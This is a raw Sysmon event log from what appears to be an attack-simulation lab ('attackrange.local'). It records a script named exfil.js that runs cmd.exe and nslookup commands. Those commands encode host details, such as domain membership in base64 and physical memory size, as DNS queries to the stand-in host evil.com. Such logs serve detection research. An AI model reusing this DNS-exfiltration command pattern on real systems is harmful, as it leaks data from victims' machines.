14:21:27.004{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlqhz.tmpMD5=6549F05B1861103256248974C2999EAD,SHA256=419CF8C4CFB601A92C88A029ACF678E4FE5D927543E581B1FD8233D6D0B2C4E4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000207969Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.997{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nljihqlmp.tmpMD5=B2B1D75715AF357A6B4398F385A141DD,SHA256=A1FA40C2F8588360C75C13349E8A2F679279989093D68809396DFBEE5B7D57B5,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000207968Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.980{2E1864BB-18E8-629A-3A43-000000005F02}43364640C:\Windows\system32\conhost.exe{2E1864BB-18E8-629A-3B43-000000005F02}7084C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207967Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.978{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207966Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.978{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207965Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.977{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18E8-629A-3B43-000000005F02}7084C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000207964Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.977{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207963Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.977{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207962Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.977{2E1864BB-18E8-629A-3943-000000005F02}21325516C:\Windows\system32\cmd.exe{2E1864BB-18E8-629A-3B43-000000005F02}7084C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000207961Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.977{2E1864BB-18E8-629A-3B43-000000005F02}7084C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A RG9tYWluTWVtYmVyOiBubw== evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18E8-629A-3943-000000005F02}2132C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A RG9tYWluTWVtYmVyOiBubw== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nljihqlmp.tmp 2>&1 10341000x8000000000000000207960Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.959{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18E8-629A-3A43-000000005F02}4336C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207959Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.959{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18E8-629A-3A43-000000005F02}4336C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207958Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.944{2E1864BB-18E8-629A-3A43-000000005F02}43364640C:\Windows\system32\conhost.exe{2E1864BB-18E8-629A-3943-000000005F02}2132C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207957Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.944{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18E8-629A-3A43-000000005F02}4336C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cd4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000207956Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.928{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207955Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.928{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207954Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.928{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18E8-629A-3943-000000005F02}2132C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000207953Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.928{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207952Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.928{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207951Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.928{2E1864BB-18E0-629A-6742-000000005F02}39765384C:\Windows\System32\WScript.exe{2E1864BB-18E8-629A-3943-000000005F02}2132C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\windows.storage.dll+16e79b|C:\Windows\System32\windows.storage.dll+16e4b1|C:\Windows\System32\windows.storage.dll+16e0fe|C:\Windows\System32\windows.storage.dll+16f3a0|C:\Windows\System32\windows.storage.dll+16de4e|C:\Windows\System32\windows.storage.dll+fce4d|C:\Windows\System32\windows.storage.dll+fd58c|C:\Windows\System32\windows.storage.dll+fc8f0|C:\Windows\System32\SHELL32.dll+49d0f|C:\Windows\System32\SHELL32.dll+49b9c|C:\Windows\System32\SHELL32.dll+b2f5e|C:\Windows\System32\shcore.dll+33fbd|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000207950Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.937{2E1864BB-18E8-629A-3943-000000005F02}2132C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.Exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A RG9tYWluTWVtYmVyOiBubw== evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nljihqlmp.tmp 2>&1C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{2E1864BB-18E0-629A-6742-000000005F02}3976C:\Windows\System32\wscript.exe"C:\Windows\System32\WScript.exe" "C:\Temp\exfil.js" 23542300x8000000000000000207949Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.928{2E1864BB-18E0-629A-6742-000000005F02}3976ATTACKRANGE\AdministratorC:\Windows\System32\WScript.exeC:\Users\ADMINI~1\AppData\Local\Temp\2\nlgldtl.tmpMD5=56DBCEFC15EB1306F8CE602736A8089D,SHA256=D5DF994C5494FA571A4E37094E6011B6EAA7240C900C90D4E5CDDC8058C5BBCD,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000207948Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.912{2E1864BB-18E8-629A-3743-000000005F02}33962632C:\Windows\system32\conhost.exe{2E1864BB-18E8-629A-3843-000000005F02}2316C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207947Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.912{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207946Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.912{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207945Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.912{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207944Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.912{2E1864BB-E13E-6299-0C00-000000005F02}8564116C:\Windows\system32\svchost.exe{2E1864BB-E14E-6299-2E00-000000005F02}2120C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5ea84|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7af03|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+536cc|C:\Windows\System32\RPCRT4.dll+35ac4|C:\Windows\System32\RPCRT4.dll+349dd|C:\Windows\System32\RPCRT4.dll+3528b|C:\Windows\System32\RPCRT4.dll+2107c|C:\Windows\System32\RPCRT4.dll+214fc|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a7aa|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207943Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.912{2E1864BB-FA28-6299-3207-000000005F02}50324048C:\Windows\system32\csrss.exe{2E1864BB-18E8-629A-3843-000000005F02}2316C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000207942Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.912{2E1864BB-18E8-629A-3643-000000005F02}75087440C:\Windows\system32\cmd.exe{2E1864BB-18E8-629A-3843-000000005F02}2316C:\Windows\system32\nslookup.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b830|C:\Windows\System32\KERNELBASE.dll+6b316|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000207941Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.916{2E1864BB-18E8-629A-3843-000000005F02}2316C:\Windows\System32\nslookup.exe10.0.14393.0 (rs1_release.160715-1616)nslookupMicrosoft® Windows® Operating SystemMicrosoft Corporationnslookup.exenslookup.exe -timeout=5 -retry=3 -type=A PhyMemSize: 33983848448 evil.com C:\Temp\ATTACKRANGE\Administrator{2E1864BB-FA2A-6299-1510-460000000000}0x4610152HighMD5=488698C899FE524430270C1D14FE99CF,SHA256=24553BFAB13871FAF3EE6F1F8EFECC5D25368A706A42CA35319228D3547418FA,IMPHASH=446F3F94B921C80C9E9497075AA3EF61{2E1864BB-18E8-629A-3643-000000005F02}7508C:\Windows\System32\cmd.exe"C:\Windows\system32\cmd.exe" /c nslookup.exe -timeout=5 -retry=3 -type=A PhyMemSize: 33983848448 evil.com > C:\Users\ADMINI~1\AppData\Local\Temp\2\nlgldtl.tmp 2>&1 10341000x8000000000000000207940Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.881{2E1864BB-E13E-6299-1000-000000005F02}3641888C:\Windows\system32\svchost.exe{2E1864BB-18E8-629A-3743-000000005F02}3396C:\Windows\system32\conhost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d09|C:\Windows\SYSTEM32\ntdll.dll+1e89a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207939Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.881{2E1864BB-E13E-6299-1000-000000005F02}3641376C:\Windows\system32\svchost.exe{2E1864BB-18E8-629A-3743-000000005F02}3396C:\Windows\system32\conhost.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6144|c:\windows\system32\themeservice.dll+144a|c:\windows\system32\themeservice.dll+4175|c:\windows\system32\themeservice.dll+3379|c:\windows\system32\themeservice.dll+31a3|C:\Windows\system32\svchost.exe+1380|C:\Windows\System32\sechost.dll+14422|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207938Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 14:21:28.881{2E1864BB-18E8-629A-3743-000000005F02}33962632C:\Windows\system32\conhost.exe{2E1864BB-18E8-629A-3643-000000005F02}7508C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000207937Microsoft-Windows-Sysmon/Operationalwin-dc-ct-attack-range-304.attackrange.local-2022-06-03 